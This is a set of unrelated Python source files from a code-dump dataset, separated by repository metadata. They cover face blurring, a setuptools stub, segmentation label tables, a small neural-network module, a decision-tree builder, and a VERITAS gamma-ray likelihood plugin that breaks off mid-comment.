DIR = '/home/pikachu/PycharmProjects/deidentification/Scraped_Images/Faces/train/'
batch = 32
images= []
fnames = glob.glob(DIR + '*.jpg')
for fname in fnames:
print fname
fname_pre = fname.replace('train', 'train_pre')
fname_deid = fname.replace('train', 'train_deid').replace('.','_deid.')
#im = Image.open(fname)
#image = face_recognition.load_image_file(fname)
image = cv2.imread(fname)
face_locations = face_recognition.face_locations(image)
for face in face_locations:
print face
(top, right, bottom, left) = face
face_image = image[top:bottom, left:right]
# Blur the face image
face_image = cv2.GaussianBlur(face_image, (99, 99), 30)
# Put the blurred face region back into the frame image
image[top:bottom, left:right] = face_image
#im.paste(ic, box)
cv2.imwrite(fname_deid, image)
| [
"noreply@github.com"
] | drewclausen.noreply@github.com |
145b81cc8e89eadb2199ff2a224737e05fd9b277 | 4b957eee31825b0e4ba130e92f1eef4093c23c88 | /venv/bin/easy_install-3.6 | 5f068d38d2991b6357b174d098d65e4fe613def3 | [
"MIT"
] | permissive | probantan/Awwards | 53ab83ccf9d3ad8d23cbf9793daae9954090d6d7 | 9cfe3d8fbe94637908128f1b982d7a99cf7a57d2 | refs/heads/master | 2022-12-05T21:19:04.669296 | 2019-06-04T15:47:30 | 2019-06-04T15:47:30 | 152,769,801 | 0 | 0 | null | 2022-11-22T03:50:32 | 2018-10-12T15:16:43 | Python | UTF-8 | Python | false | false | 265 | 6 | #!/home/protus/Documents/awwwards/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"protus.bantan@gmail.com"
] | protus.bantan@gmail.com |
84ea579dc7e53db3bd178af01dd9896e9f4556b4 | bb5f5283fccab376218ab2c7d12955cbea176733 | /testing/DeepLabv3_pytorch/src/apollo_utilities/labels_apollo.py | 445963f9877657e17985d6c593e58eac5014e1d2 | [] | no_license | Avishaek/ir-project | 4c08b824a09e8205d0192b3898ec61674a30b1ea | 265e1a60542cb1668706213835de716a6899acef | refs/heads/master | 2023-08-13T22:58:43.098925 | 2020-10-10T09:23:29 | 2020-10-10T09:23:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,208 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Zpark labels"""
from collections import namedtuple
#--------------------------------------------------------------------------------
# Definitions
#--------------------------------------------------------------------------------
# a label and all meta information
Label = namedtuple('Label', [
'name' , # The identifier of this label, e.g. 'car', 'person', ... .
# We use them to uniquely name a class
'clsId' ,
'id' , # An integer ID that is associated with this label.
# The IDs are used to represent the label in ground truth images
# An ID of -1 means that this label does not have an ID and thus
# is ignored when creating ground truth images (e.g. license plate).
# Do not modify these IDs, since exactly these IDs are expected by the
# evaluation server.
'trainId' , # Feel free to modify these IDs as suitable for your method. Then create
# ground truth images with train IDs, using the tools provided in the
# 'preparation' folder. However, make sure to validate or submit results
# to our evaluation server using the regular IDs above!
# For trainIds, multiple labels might have the same ID. Then, these labels
# are mapped to the same class in the ground truth images. For the inverse
# mapping, we use the label that is defined first in the list below.
# For example, mapping all void-type classes to the same ID in training,
# might make sense for some approaches.
# Max value is 255!
'category' , # The name of the category that this label belongs to
'categoryId' , # The ID of this category. Used to create ground truth images
# on category level.
'hasInstances', # Whether this label distinguishes between single instances or not
'ignoreInEval', # Whether pixels having this class as ground truth label are ignored
# during evaluations or not
'color' , # The color of this label
])
#--------------------------------------------------------------------------------
# A list of all labels
#--------------------------------------------------------------------------------
# Please adapt the train IDs as appropriate for you approach.
# Note that you might want to ignore labels with ID 255 during training.
# Further note that the current train IDs are only a suggestion. You can use whatever you like.
# Make sure to provide your results using the original IDs and not the training IDs.
# Note that many IDs are ignored in evaluation and thus you never need to predict these!
labels = [
# name clsId id trainId category catId hasInstanceignoreInEval color
Label('others' , 0 , 0, 255 , '其他' , 0 ,False , True , 0x000000 ),
Label('rover' , 0x01 , 1, 255 , '其他' , 0 ,False , True , 0X000000 ),
Label('sky' , 0x11 , 17, 0 , '天空' , 1 ,False , False , 0x4682B4 ),
Label('car' , 0x21 , 33, 1 , '移动物体', 2 ,True , False , 0x00008E ),
Label('car_groups' , 0xA1 , 161, 1 , '移动物体', 2 ,True , False , 0x00008E ),
Label('motorbicycle' , 0x22 , 34, 2 , '移动物体', 2 ,True , False , 0x0000E6 ),
Label('motorbicycle_group' , 0xA2 , 162, 2 , '移动物体', 2 ,True , False , 0x0000E6 ),
Label('bicycle' , 0x23 , 35, 3 , '移动物体', 2 ,True , False , 0x770B20 ),
Label('bicycle_group' , 0xA3 , 163, 3 , '移动物体', 2 ,True , False , 0x770B20 ),
Label('person' , 0x24 , 36, 4 , '移动物体', 2 ,True , False , 0x0080c0 ),
Label('person_group' , 0xA4 , 164, 4 , '移动物体', 2 ,True , False , 0x0080c0 ),
Label('rider' , 0x25 , 37, 5 , '移动物体', 2 ,True , False , 0x804080 ),
Label('rider_group' , 0xA5 , 165, 5 , '移动物体', 2 ,True , False , 0x804080 ),
Label('truck' , 0x26 , 38, 6 , '移动物体', 2 ,True , False , 0x8000c0 ),
Label('truck_group' , 0xA6 , 166, 6 , '移动物体', 2 ,True , False , 0x8000c0 ),
Label('bus' , 0x27 , 39, 7 , '移动物体', 2 ,True , False , 0xc00040 ),
Label('bus_group' , 0xA7 , 167, 7 , '移动物体', 2 ,True , False , 0xc00040 ),
Label('tricycle' , 0x28 , 40, 8 , '移动物体', 2 ,True , False , 0x8080c0 ),
Label('tricycle_group' , 0xA8 , 168, 8 , '移动物体', 2 ,True , False , 0x8080c0 ),
Label('road' , 0x31 , 49, 9 , '平面' , 3 ,False , False , 0xc080c0 ),
Label('siderwalk' , 0x32 , 50, 10 , '平面' , 3 ,False , False , 0xc08040 ),
Label('traffic_cone' , 0x41 , 65, 11 , '路间障碍', 4 ,False , False , 0x000040 ),
Label('road_pile' , 0x42 , 66, 12 , '路间障碍', 4 ,False , False , 0x0000c0 ),
Label('fence' , 0x43 , 67, 13 , '路间障碍', 4 ,False , False , 0x404080 ),
Label('traffic_light' , 0x51 , 81, 14 , '路边物体', 5 ,False , False , 0xc04080 ),
Label('pole' , 0x52 , 82, 15 , '路边物体', 5 ,False , False , 0xc08080 ),
Label('traffic_sign' , 0x53 , 83, 16 , '路边物体', 5 ,False , False , 0x004040 ),
Label('wall' , 0x54 , 84, 17 , '路边物体', 5 ,False , False , 0xc0c080 ),
Label('dustbin' , 0x55 , 85, 18 , '路边物体', 5 ,False , False , 0x4000c0 ),
Label('billboard' , 0x56 , 86, 19 , '路边物体', 5 ,False , False , 0xc000c0 ),
Label('building' , 0x61 , 97, 20 , '建筑' , 6 ,False , False , 0xc00080 ),
Label('bridge' , 0x62 , 98, 255 , '建筑' , 6 ,False , True , 0x808000 ),
Label('tunnel' , 0x63 , 99, 255 , '建筑' , 6 ,False , True , 0x800000 ),
Label('overpass' , 0x64 , 100, 255 , '建筑' , 6 ,False , True , 0x408040 ),
Label('vegatation' , 0x71 , 113, 21 , '自然' , 7 ,False , False , 0x808040 ),
Label('unlabeled' , 0xFF , 255, 255 , '未标注' , 8 ,False , True , 0xFFFFFF ),
]
#--------------------------------------------------------------------------------
# Create dictionaries for a fast lookup
#--------------------------------------------------------------------------------
# Please refer to the main method below for example usages!
# name to label object
name2label = {label.name: label for label in labels}
# id to label object
id2label = {label.id: label for label in labels}
# trainId to label object
trainId2label = {label.trainId: label for label in reversed(labels)}
# category to list of label objects
category2labels = {}
for label in labels:
category = label.category
if category in category2labels:
category2labels[category].append(label)
else:
category2labels[category] = [label]
color2label = {}
for label in labels:
#color = (int(label.color[2:4],16),int(label.color[4:6],16),int(label.color[6:8],16))
color = label.color
r = color // (256*256)
g = (color-256*256*r) // 256
b = (color-256*256*r-256*g)
color2label[(r, g, b)] = [label]
#--------------------------------------------------------------------------------
# Assure single instance name
#--------------------------------------------------------------------------------
""" returns the label name that describes a single instance (if possible)
e.g. input | output
----------------------
car | car
cargroup | car
foo | None
foogroup | None
skygroup | None
"""
def assureSingleInstanceName(name):
# if the name is known, it is not a group
if name in name2label:
return name
# test if the name actually denotes a group
if not name.endswith("group"):
return None
# remove group
name = name[:-len("group")]
# test if the new name exists
if not name in name2label:
return None
# test if the new name denotes a label that actually has instances
if not name2label[name].hasInstances:
return None
# all good then
return name
#--------------------------------------------------------------------------------
# Main for testing
#--------------------------------------------------------------------------------
# just a dummy main
if __name__ == "__main__":
# Print all the labels
print("List of cityscapes labels:")
print("")
print(" {:>21} | {:>3} | {:>7} | {:>14} |".format('name', 'id', 'trainId', 'category')\
+ "{:>10} | {:>12} | {:>12}".format('categoryId', 'hasInstances', 'ignoreInEval'))
print(" " + ('-' * 98))
for label in labels:
print(" {:>21} | {:>3} | {:>7} |".format(label.name, label.id, label.trainId)\
+ " {:>14} |{:>10} ".format(label.category, label.categoryId)\
+ "| {:>12} | {:>12}".format(label.hasInstances, label.ignoreInEval ))
print("")
print("Example usages:")
# Map from name to label
name = '机动车'
id = name2label[name].id
print("ID of label '{name}': {id}".format(name=name, id=id))
# Map from ID to label
category = id2label[id].category
print("Category of label with ID '{id}': {category}".format(id=id, category=category))
# Map from trainID to label
trainId = 0
name = trainId2label[trainId].name
print("Name of label with trainID '{id}': {name}".format(id=trainId, name=name))
| [
"hasanhaja@gmail.com"
] | hasanhaja@gmail.com |
51aaebc35564d5dae0bcbbb59a5ba354c953f921 | 854e3208abe868cc5b2b7ab2accc9644c4eefbbe | /code/modules.py | 12319e5cae2342ef9f5f62cb3d1719356c72d0a4 | [] | no_license | vbordign/DL-mini | 5e8b5acf73ebeba763eb507a1c3671cc3e0dce7d | 8529689993565c6377d548caac2254b071883a81 | refs/heads/main | 2023-06-28T19:31:41.527134 | 2021-07-26T08:19:46 | 2021-07-26T08:19:46 | 367,988,012 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,363 | py | from torch import empty
from initialization import *
class Module(object):
'''
Creates the a parent Module with forward and backward operations.
Methods
-------
forward :
runs a forward pass
backward :
accumulates gradient for backward pass
param :
returns parameters
'''
def forward(self, *input):
raise NotImplementedError
def backward(self, *gradwrtoutput):
raise NotImplementedError
def param(self):
return []
class Linear(Module):
'''
Creates the Linear layer module.
Attributes
----------
bias_flag: bool
flag indicating if there is a bias
w: List(FloatTensor)
weight matrix and gradient
bias: List(FloatTensor)
bias vector and gradient
Methods
-------
forward :
runs a forward pass
backward :
accumulates gradient for backward pass
param :
returns parameters and gradient
'''
def __init__(self, in_features, out_features, bias_flag=True, init = 'uniform'):
super().__init__()
self.bias_flag = bias_flag
if init == 'xavier':
self.w = [initialize_xavier_normal(empty(out_features, in_features)),
empty(out_features, in_features).zero_()]
else:
self.w = [initialize_uniform(empty(out_features, in_features)),
empty(out_features, in_features).zero_()]
if bias_flag:
if init == 'xavier':
self.bias = [initialize_xavier_normal(empty(out_features, 1)),
empty(out_features, 1).zero_()]
else:
self.bias = [initialize_uniform(empty(out_features, 1)),
empty(out_features, 1).zero_()]
else:
self.bias = [empty(out_features, 1).zero_(), empty(out_features, 1).zero_()]
def forward(self, x):
self.x = x
output = self.w[0].mm(x.t())+ self.bias[0]
return output.t()
def backward(self, gradwrtoutput):
if self.bias_flag:
self.bias[1] = gradwrtoutput.sum(0)[:,None]
self.w[1] = gradwrtoutput.t().mm(self.x)
return gradwrtoutput.mm(self.w[0])
def param(self):
return [self.w, self.bias]
class Sequential(Module):
'''
Creates the Sequential container module.
Attributes
----------
modules = List(Module)
list of Module instances
Methods
-------
forward :
runs a forward pass
backward :
accumulates gradient for backward pass
param :
returns parameters and gradient
'''
def __init__(self, *args):
super(Sequential, self).__init__()
self.modules = []
for module in args:
self.modules.append(module)
def forward(self, x):
for module in self.modules:
x = module.forward(x)
return x
def backward(self, gradwrtoutput):
for module in self.modules[::-1]:
gradwrtoutput = module.backward(gradwrtoutput)
def param(self):
param_list = []
for module in self.modules:
param_list = param_list + module.param()
return param_list
def zero_grad(self):
param_list = self.param()
for p in param_list:
p[1].zero_()
| [
"virginia.bordignon@epfl.ch"
] | virginia.bordignon@epfl.ch |
2d6e5f19e61795d94a3b817b0a1f16c5256a54de | f2da63de512183804290bfcabfa60eaca3649e05 | /projects/StatCan/non-probability/handcraftsman/chap03/code/dtree.py | 0f015898b2acb2e4ed655a7df2ecca353250e4b5 | [] | no_license | paradisepilot/statistics | a94bb57ebe453d49c06815c523e8f633423cb68e | 50daf644baca1f40253edf91083ed42d4c5f9342 | refs/heads/master | 2022-07-25T16:19:07.751886 | 2022-06-26T21:18:38 | 2022-06-26T21:18:38 | 5,012,656 | 0 | 2 | null | 2019-04-22T06:52:55 | 2012-07-13T01:11:42 | HTML | UTF-8 | Python | false | false | 9,345 | py | # File: dtree.py
# from chapter 3 of _Tree-based Machine Learning Algorithms_
#
# Author: Clinton Sheppard <fluentcoder@gmail.com>
# Copyright (c) 2017 Clinton Sheppard
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
from numbers import Number
import operator
import math
def build(data, outcomeLabel, continuousAttributes=None):
attrIndexes = [index for index, label in enumerate(data[0]) if label != outcomeLabel]
print( "attrIndexes: " + str(attrIndexes) )
outcomeIndex = data[0].index(outcomeLabel)
print( "outcomeIndex: " + str(outcomeIndex) )
continuousAttrIndexes = set()
if continuousAttributes is not None:
continuousAttrIndexes = {data[0].index(label) for label in continuousAttributes}
if len(continuousAttrIndexes) != len(continuousAttributes):
raise Exception('One or more continuous column names are duplicates.')
else:
for attrIndex in attrIndexes:
uniqueValues = {row[attrIndex] for rowIndex, row in enumerate(data) if rowIndex > 0}
numericValues = {value for value in uniqueValues if isinstance(value, Number)}
if len(uniqueValues) == len(numericValues):
continuousAttrIndexes.add(attrIndex)
print( "continuousAttrIndexes: " + str(continuousAttrIndexes) )
nodes = []
lastNodeNumber = 0
workQueue = [ (-1, lastNodeNumber, set(i for i in range(1, len(data)))) ]
while len(workQueue) > 0:
print( "~~~~~~~~~~" )
parentNodeId, nodeId, dataRowIndexes = workQueue.pop()
print(
"parentNodeId: " + str(parentNodeId) + ", " +
"nodeId: " + str(nodeId) + ", " +
"dataRowIndexes: " + str(dataRowIndexes)
)
uniqueOutcomes = set(data[i][outcomeIndex] for i in dataRowIndexes)
if len(uniqueOutcomes) == 1:
nodes.append((nodeId, uniqueOutcomes.pop()))
continue
potentials = _get_potentials(
attrIndexes = attrIndexes,
continuousAttrIndexes = continuousAttrIndexes,
data = data,
dataRowIndexes = dataRowIndexes,
outcomeIndex = outcomeIndex
)
attrIndex, attrValue, isMatch = potentials[0][1:]
print(
"attrIndex: " + str(attrIndex) + ", " +
"attrValue: " + str(attrValue) + ", " +
"isMatch: " + str(isMatch)
)
matches = {
rowIndex for rowIndex in dataRowIndexes
if isMatch(data[rowIndex][attrIndex],attrValue)
}
nonMatches = dataRowIndexes - matches
lastNodeNumber += 1
matchId = lastNodeNumber
workQueue.append((nodeId, matchId, matches))
print( " match: " + str( (nodeId, matchId, matches) ) )
lastNodeNumber += 1
nonMatchId = lastNodeNumber
workQueue.append((nodeId, nonMatchId, nonMatches))
print( "non-match: " + str( (nodeId, nonMatchId, nonMatches) ) )
nodes.append(
(nodeId, attrIndex, attrValue, isMatch, matchId, nonMatchId, len(matches), len(nonMatches))
)
print( "~~~~~~~~~~" )
nodes = sorted(nodes, key = lambda n: n[0])
return DTree(nodes, data[0])
def _get_potentials(
attrIndexes,
continuousAttrIndexes,
data,
dataRowIndexes,
outcomeIndex
):
uniqueAttributeValuePairs = {
(attrIndex, data[rowIndex][attrIndex], operator.eq)
for attrIndex in attrIndexes
if attrIndex not in continuousAttrIndexes
for rowIndex in dataRowIndexes
}
print( "uniqueAttributeValuePairs: " + str(uniqueAttributeValuePairs) )
print( "len(uniqueAttributeValuePairs) = " + str(len(uniqueAttributeValuePairs)) )
print()
continuousAttributeValuePairs = _get_continuous_av_pairs(
continuousAttrIndexes,
data,
dataRowIndexes
)
print( "continuousAttributeValuePairs: " + str(continuousAttributeValuePairs) )
print( "len(continuousAttributeValuePairs) = " + str(len(continuousAttributeValuePairs)) )
print()
uniqueAttributeValuePairs |= continuousAttributeValuePairs
print( "uniqueAttributeValuePairs: " + str(uniqueAttributeValuePairs) )
print( "len(uniqueAttributeValuePairs) = " + str(len(uniqueAttributeValuePairs)) )
print()
potentials = sorted(
(-_get_bias(avPair, dataRowIndexes, data, outcomeIndex), avPair[0], avPair[1], avPair[2])
for avPair in uniqueAttributeValuePairs
)
print( "potentials: " + str(potentials) )
print( "len(potentials) = " + str(len(potentials)) )
print()
return potentials
def _get_continuous_av_pairs(continuousAttrIndexes, data, dataRowIndexes):
avPairs = set()
for attrIndex in continuousAttrIndexes:
sortedAttrValues = [i for i in sorted(data[rowIndex][attrIndex] for rowIndex in dataRowIndexes)]
indexes = _get_discontinuity_indexes(
sortedAttrValues = sortedAttrValues,
maxIndexes = max(
math.sqrt(len(sortedAttrValues)),
min(10,len(sortedAttrValues))
)
)
for index in indexes:
avPairs.add((attrIndex, sortedAttrValues[index], operator.gt))
return avPairs
def _get_discontinuity_indexes(sortedAttrValues, maxIndexes):
indexes = []
for i in _generate_discontinuity_indexes_center_out(sortedAttrValues):
indexes.append(i)
if len(indexes) >= maxIndexes:
break
return indexes
def _generate_discontinuity_indexes_center_out(sortedAttrValues):
# print( "sortedAttrValues: " + str(sortedAttrValues) )
center = len(sortedAttrValues) // 2
left = center - 1
right = center + 1
while left >= 0 or right < len(sortedAttrValues):
if left >= 0:
if sortedAttrValues[left] != sortedAttrValues[left + 1]:
#print(
# "center: " + str(center) + ", " +
# "left: " + str(left) + ", " +
# "right: " + str(right) + "; " +
# "yield: " + str(left)
# )
yield left
left -= 1
if right < len(sortedAttrValues):
if sortedAttrValues[right - 1] != sortedAttrValues[right]:
#print(
# "center: " + str(center) + ", " +
# "left: " + str(left) + ", " +
# "right: " + str(right) + "; " +
# "yield: " + str(right - 1)
# )
yield right - 1
right += 1
def _get_bias(avPair, dataRowIndexes, data, outcomeIndex):
attrIndex, attrValue, isMatch = avPair
matchIndexes = {i for i in dataRowIndexes if isMatch(data[i][attrIndex], attrValue)}
nonMatchIndexes = dataRowIndexes - matchIndexes
matchOutcomes = {data[i][outcomeIndex] for i in matchIndexes}
nonMatchOutcomes = {data[i][outcomeIndex] for i in nonMatchIndexes}
numPureRows = (len(matchIndexes) if len( matchOutcomes) == 1 else 0) \
+ (len(nonMatchIndexes) if len(nonMatchOutcomes) == 1 else 0)
percentPure = numPureRows / len(dataRowIndexes)
numNonPureRows = len(dataRowIndexes) - numPureRows
percentNonPure = 1 - percentPure
split = 1 - abs(len(matchIndexes) - len(nonMatchIndexes)) / len(dataRowIndexes) - .001
splitBias = split * percentNonPure if numNonPureRows > 0 else 0
return splitBias + percentPure
class DTree:
def __init__(self, nodes, attrNames):
self._nodes = nodes
self._attrNames = attrNames
@staticmethod
def _is_leaf(node):
return len(node) == 2
def __str__(self):
s = ''
for node in self._nodes:
if self._is_leaf(node):
s += '{}: {}\n'.format(node[0], node[1])
else:
nodeId, attrIndex, attrValue, isMatch, nodeIdIfMatch, \
nodeIdIfNonMatch, matchCount, nonMatchCount = node
s += '{0}: {1}{7}{2}, {5} Yes->{3}, {6} No->{4}\n'.format(
nodeId, self._attrNames[attrIndex], attrValue,
nodeIdIfMatch, nodeIdIfNonMatch, matchCount,
nonMatchCount, '=' if isMatch == operator.eq else '>')
return s
def get_prediction(self, data):
currentNode = self._nodes[0]
while True:
if self._is_leaf(currentNode):
return currentNode[1]
nodeId, attrIndex, attrValue, isMatch, nodeIdIfMatch, \
nodeIdIfNonMatch = currentNode[:6]
currentNode = self._nodes[nodeIdIfMatch if
isMatch(data[attrIndex], attrValue) else nodeIdIfNonMatch]
| [
"paradisepilot@gmail.com"
] | paradisepilot@gmail.com |
8dbe189d86a7db8906f28ee1d66bafbbfb7fa828 | 93e9b5aeafbf3a210ef2fc1cca8f19b755ff2be1 | /test/workshop/joint_fit_example/VERITASLike.py | 168aab6b2b0971321333efd6d714029b33841a4e | [
"Apache-2.0"
] | permissive | jasonfan1997/umd_icecube_analysis_tutorial | 5805bcf74411fd864df4932e61daac1241cd5a54 | 50bf3af27f81d719953ac225f199e733b5c0bddf | refs/heads/master | 2023-01-09T01:06:16.750101 | 2020-11-03T21:08:58 | 2020-11-03T21:08:58 | 269,291,684 | 0 | 0 | Apache-2.0 | 2020-06-04T07:35:59 | 2020-06-04T07:35:58 | null | UTF-8 | Python | false | false | 18,376 | py | __author__ = 'giacomov'
#Udara created this version just after the git comit
import collections
import ROOT
import numpy as np
import scipy.integrate
import astromodels
from threeML.io.cern_root_utils.io_utils import get_list_of_keys, open_ROOT_file
from threeML.io.cern_root_utils.tobject_to_numpy import tgraph_to_arrays, th2_to_arrays, tree_to_ndarray
from threeML.plugin_prototype import PluginPrototype
from threeML.exceptions.custom_exceptions import custom_warnings
from threeML.utils.statistics.likelihood_functions import poisson_observed_poisson_background
__instrument_name = "VERITAS"
# Integrate the interpolation of the effective area for each bin in the residstribution matrix, then sum over the MC
# energies for the same bin, then renormalize the latter to be the same. The factor should be the same for all
# channels
# This is the data format v 1.0 agreed with Udara:
# * each run is in a different folder within the ROOT file, called run_XXXXXX
# * each run contains the following trees:
_trees_in_run = ['data_on', # Event list in the source region
'data_off', # Event list of the background region
'tRunSummary', # Summary info on the run (exposure, and so on, see below)
'gMeanEffectiveArea', # Effective area
'fAccZe_0', # relative acceptance with respect to the on-axis area
'hMigration' # Redistribution matrix (energy dispersion)
]
# In the data_* trees we have:
_columns_in_data_tree = ['Time', # it is the MJD of individual events
'Erec' # reconstructed energy. *****Note that there are some events with negative
# energy. Those are the events that we were unable to reconstruct energy.
# In VERITAS when we calculate significance some times we use these events,
# if we are not quoting the energy. Because failing the energy reconstruction
# does not mean that the event is a bad event. However, if we quote an energy
# band we do not use them.
'Xoff', # this is the X offset from the detector centre in degrees.
'Yoff', # this is the Y offset from the detector centre in degrees.
'theta2' # X^2 + Y^2 (i.e., off-axis radius squared)
]
class VERITASRun(object):
def __init__(self, root_file, run_name):
self._run_name = run_name
# Read the data from the ROOT file
with open_ROOT_file(root_file) as f:
# Read first the TTrees as pandas DataFrame
self._data_on = tree_to_ndarray(f.Get(run_name+'/data_on')) # type: np.ndarray
self._data_off = tree_to_ndarray(f.Get(run_name+'/data_off')) # type: np.ndarray
self._tRunSummary = np.squeeze(tree_to_ndarray(f.Get(run_name+'/tRunSummary'))) # type: np.ndarray
# Now read the histogram
self._log_recon_energies, \
self._log_mc_energies, \
self._hMigration = th2_to_arrays(f.Get(run_name + "/hMigration"))
# Transform energies to keV (they are in TeV)
self._log_recon_energies += 9
self._log_mc_energies += 9
# Compute bin centers and bin width of the Monte Carlo energy bins
self._dE = (10 ** self._log_mc_energies[1:] - 10 ** self._log_mc_energies[:-1])
self._mc_energies_c = (10 ** self._log_mc_energies[1:] + 10 ** self._log_mc_energies[:-1]) / 2.0
self._recon_energies_c = (10 ** self._log_recon_energies[1:] + 10 ** self._log_recon_energies[:-1]) / 2.0
self._n_chan = self._log_recon_energies.shape[0] - 1
# Remove all nans by substituting them with 0.0
idx = np.isfinite(self._hMigration)
self._hMigration[~idx] = 0.0
# Read the TGraph
tgraph = f.Get(run_name + "/gMeanEffectiveArea")
self._log_eff_area_energies, self._eff_area = tgraph_to_arrays(tgraph)
# Transform the effective area to cm2 (it is in m2 in the file)
self._eff_area *= 1e8 #This value is for VEGAS, because VEGAS effective area is in cm2
# Transform energies to keV
self._log_eff_area_energies += 9
# Now use the effective area provided in the file to renormalize the migration matrix appropriately
self._renorm_hMigration()
# Exposure is tOn*(1-tDeadtimeFrac)
self._exposure = float(1 - self._tRunSummary['DeadTimeFracOn']) * float(self._tRunSummary['tOn'])
# Members for generating OGIP equivalents
self._mission = "VERITAS"
self._instrument = "VERITAS"
# Now bin the counts
self._counts, _ = self._bin_counts_log(self._data_on['Erec'] * 1e9, self._log_recon_energies)
# Now bin the background counts
self._bkg_counts, _ = self._bin_counts_log(self._data_off['Erec'] * 1e9, self._log_recon_energies)
print("Read a %s x %s matrix, spectrum has %s bins, eff. area has %s elements" %
(self._hMigration.shape[0], self._hMigration.shape[1], self._counts.shape[0], self._eff_area.shape[0]))
# Read in the background renormalization (ratio between source and background region)
self._bkg_renorm = float(self._tRunSummary['OffNorm'])
self._start_energy = np.log10(175E6)#175 GeV in keV
self._end_energy = np.log10(18E9)#18 TeV in keV
self._first_chan = (np.abs(self._log_recon_energies-self._start_energy)).argmin()#Values used by Giacomo 61
self._last_chan = (np.abs(self._log_recon_energies-self._end_energy)).argmin()#Values used by Giacomo 110
def _renorm_hMigration(self):
# Get energies where the effective area is given
energies_eff = (10 ** self._log_eff_area_energies)
# Get the unnormalized effective area x photon flux contained in the migration matrix
v = np.sum(self._hMigration, axis=0)
# Get the expected photon flux using the simulated spectrum
mc_e1 = 10 ** self._log_mc_energies[:-1]
mc_e2 = 10 ** self._log_mc_energies[1:]
#Below is the original Udara Modified it
#expectation = self._simulated_spectrum(self._mc_energies_c) * (mc_e2 - mc_e1)
#Below was added by Udara
rc_e1 = 10 ** self._log_recon_energies[:-1]
rc_e2 = 10 ** self._log_recon_energies[1:]
expectation = self._simulated_spectrum(self._recon_energies_c) * (rc_e2 - rc_e1)
# Get the unnormalized effective area
#new_v = v / expectation#This was an original commented by Udara
# Compute the renormalization based on the energy range from 200 GeV to 1 TeV
emin = 0.2 * 1e9
emax = 1 * 1e9
#idx = (self._mc_energies_c > emin) & (self._mc_energies_c < emax)
#avg1 = np.average(new_v[idx])
#idx = (energies_eff > emin) & (energies_eff < emax)
#avg2 = np.average(self._eff_area[idx])
#renorm = avg1 / avg2
#Added by Udara
v_new = np.sum(self._hMigration, axis=1)
new_v = v_new / expectation
avg1_new = new_v
avg2_new = np.interp(self._recon_energies_c, energies_eff, self._eff_area)
renorm_new = avg1_new/avg2_new
hMigration_new = self._hMigration/renorm_new[:, None]
hMigration_new[~np.isfinite(hMigration_new)] = 0
#Udara Added for effetive area systematic errors
#Uncomment the line below to study the systemati errors on the effective area
#hMigration_new = hMigration_new - hMigration_new*0.229
#print 'Energy',self._recon_energies_c
#print 'eff area',avg2_new
#print 'Migration ',new_v
#print 'renorm ',renorm_new
# Renormalize the migration matrix
#self._hMigration = self._hMigration / renorm This is the line from original
self._hMigration = hMigration_new
@staticmethod
def _bin_counts_log(counts, log_bins):
energies_on_log = np.log10(np.array(counts))
# Substitute nans (due to negative energies in unreconstructed events)
energies_on_log[~np.isfinite(energies_on_log)] = -99
return np.histogram(energies_on_log, log_bins)
@property
def migration_matrix(self):
return self._hMigration
@property
def total_counts(self):
return np.sum(self._counts)
@property
def total_background_counts(self):
return np.sum(self._bkg_counts)
def display(self):
repr = "%s:\n" % self._run_name
repr += "%s src counts, %s bkg counts\n" % (np.sum(self._counts), np.sum(self._bkg_counts))
repr += "Exposure: %.2f s, on area / off area: %.2f\n" % (self._exposure, float(self._tRunSummary['OffNorm']))
failed_on_idx = (self._data_on['Erec'] <= 0)
failed_off_idx = (self._data_off['Erec'] <= 0)
repr += "Events with failed reconstruction: %i src, %i bkg" % (np.sum(failed_on_idx), np.sum(failed_off_idx))
print(repr)
# def _build_response(self):
#
# # Interpolate the effective area on the same bins of the migration matrix
# # NOTE: these are mid energies in log space
# mid_energies = (10**self._log_mc_energies[1:] + 10**self._log_mc_energies[:-1]) / 2.0 #type: np.ndarray
#
# log_mid_energies = np.log10(mid_energies)
#
# interpolated_effective_area = np.interp(log_mid_energies,
# self._log_eff_area_energies, self._eff_area,
# left=0, right=0)
#
# # Transform to cm2 from m2
# interpolated_effective_area *= 1e4
#
# self._interpolated_effective_area = interpolated_effective_area
#
# # Get response matrix, which is effective area times energy dispersion
# # matrix = self._hMigration * interpolated_effective_area
#
# matrix = self._hMigration
#
# # Put a lower limit different than zero to avoid problems downstream when convolving a model with the response
#
# # Energies in VERITAS files are in TeV, we need them in keV
#
# response = InstrumentResponse(matrix, (10**self._log_recon_energies) * 1e9, (10**self._log_mc_energies) * 1e9)
#
# return response
#
# def get_spectrum(self):
#
# spectrum = BinnedSpectrumWithDispersion(counts=self._counts,
# exposure=self._exposure,
# response=self._response,
# is_poisson=True,
# mission=self._mission,
# instrument=self._instrument)
#
# return spectrum
#
# def get_background_spectrum(self):
#
# # Renormalization for the background (on_area / off_area), so this is usually < 1
# bkg_renorm = self._bkg_renorm
#
# # by renormalizing the exposure of the background we account for the fact that the area is larger
# # (it is equivalent to introducing a renormalization)
# renormed_exposure = self._exposure / bkg_renorm
#
# background_spectrum = BinnedSpectrum(counts=self._bkg_counts,
# exposure=renormed_exposure,
# ebounds=self._response.ebounds,
# is_poisson=True,
# mission=self._mission,
# instrument=self._instrument)
#
# return background_spectrum
def _get_diff_flux_and_integral(self, like_model):
n_point_sources = like_model.get_number_of_point_sources()
# Make a function which will stack all point sources (OGIP do not support spatial dimension)
def differential_flux(energies):
fluxes = like_model.get_point_source_fluxes(0, energies)
# If we have only one point source, this will never be executed
for i in range(1, n_point_sources):
fluxes += like_model.get_point_source_fluxes(i, energies)
return fluxes
# The following integrates the diffFlux function using Simpson's rule
# This assume that the intervals e1,e2 are all small, which is guaranteed
# for any reasonable response matrix, given that e1 and e2 are Monte-Carlo
# energies. It also assumes that the function is smooth in the interval
# e1 - e2 and twice-differentiable, again reasonable on small intervals for
